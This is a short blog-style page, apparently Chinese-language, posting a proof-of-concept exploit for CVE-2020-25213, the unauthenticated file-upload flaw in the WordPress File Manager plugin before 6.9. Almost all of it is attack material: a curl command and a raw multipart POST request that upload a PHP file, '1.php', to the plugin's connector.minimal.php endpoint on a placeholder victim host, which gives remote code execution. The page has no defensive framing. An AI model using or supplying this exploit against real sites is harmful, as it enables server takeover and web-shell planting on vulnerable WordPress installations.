WordPress File Manager < 6.9 RCE(CVE-2020-25213)PoC

# WordPress File Manager < 6.9 RCE(CVE-2020-25213)PoC

[Proof Of Concept]

“`bash
curl -ks –max-time 5 -F “reqid=17457a1fe6959” -F “cmd=upload” -F “target=l1_Lw” -F “mtime[]=1576045135” -F “upload[]=@/$file_upload” “hxxps://victim.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php”
“`

“`bash
POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1
Content-Length: 631
Content-Type: multipart/form-data; boundary=————————9689147a5989a801
Connection: close

————————–9689147a5989a801
Content-Disposition: form-data; name=”reqid”

17457a1fe6959
————————–9689147a5989a801
Content-Disposition: form-data; name=”cmd”

upload
————————–9689147a5989a801
Content-Disposition: form-data; name=”target”

l1_Lw
————————–9689147a5989a801
Content-Disposition: form-data; name=”mtime[]”

1576045135
————————–9689147a5989a801
Content-Disposition: form-data; name=”upload[]”; filename=”1.php”
Content-Type: application/octet-stream

————————–9689147a5989a801–
“`

ref:

https://forum.ywhack.com/thread-1645-1-7.html

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容